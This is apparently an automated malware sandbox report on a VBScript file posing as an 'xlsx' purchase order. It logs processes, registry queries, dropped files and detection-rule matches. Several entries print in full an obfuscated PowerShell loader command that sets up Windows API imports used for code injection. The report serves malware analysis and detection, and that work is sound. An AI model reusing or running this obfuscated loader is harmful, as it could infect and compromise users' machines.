Source: Process Memory Space: powershell.exe PID: 5064, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES47C6.tmp" "c:\Users\user\AppData\Local\Temp\bqup1euq\CSCA347F263B587453BB38F4BBC1F3B31.TMP"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\WindowsJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""TJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdlineJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES47C6.tmp" "c:\Users\user\AppData\Local\Temp\bqup1euq\CSCA347F263B587453BB38F4BBC1F3B31.TMP"Jump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4620:120:WilError_01
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5urju1b3.luw.ps1Jump to behavior
Source: classification engineClassification label: mal72.expl.winVBE@11/9@0/0
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: l:C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.pdb source: powershell.exe, 00000003.00000002.541727874.0000000005789000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""TJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_031461C5 push FFFFFFC3h; ret 3_2_03146264
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_03146070 push FFFFFFC3h; ret 3_2_03146174
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdlineJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.dllJump to dropped file
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
